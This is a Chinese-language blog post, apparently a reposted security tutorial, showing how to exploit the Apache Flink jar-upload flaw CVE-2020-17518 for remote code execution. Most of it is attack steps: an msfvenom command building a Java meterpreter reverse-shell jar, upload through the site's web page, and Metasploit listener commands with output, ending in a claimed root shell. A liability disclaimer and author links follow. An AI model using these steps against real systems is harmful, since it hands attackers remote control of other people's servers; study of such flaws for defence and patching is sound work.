赞
踩
路虽远,行则将至;事虽难,做则必成
Apache Flink <= 1.9.1(最新版本) 远程代码执行 CVE-2020-17518
近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞.
Apache Flink <= 1.9.1(最新版本)
漏洞url:
http://x.x.x.x
打开一个使用 Apache Flink 的网站,打开后页面为这样子
点击查看文件上传页面
打开MSF 生成一个 jar 木马
msfvenom ‐p java/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx‐f jar > test.jar
点击 Add 上传 jar 文件
msf进行监听端口
msf5 > use exploit/multi/handler
2 msf5 exploit(multi/handler) > set payload java/shell/reverse_tcp
3 payload => java/shell/reverse_tcp
4 msf5 exploit(multi/handler) > set lhost x.x.x.x
5 lhost => x.x.x.x
6 msf5 exploit(multi/handler) > set lport xxx
7 lport => xxx
8 msf5 exploit(multi/handler) > run
9
10 [*] Started reverse TCP handler on x.x.x.x
如下
点击下 submit
直接反弹回来一个root权限的shell
漏洞证明:
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。
转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。
CSDN: https://blog.csdn.net/weixin_48899364?type=blog 公众号: https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect 博客: https://rdyx0.github.io/ 先知社区: https://xz.aliyun.com/u/37846 SecIN: https://www.sec-in.com/author/3097 FreeBuf: https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。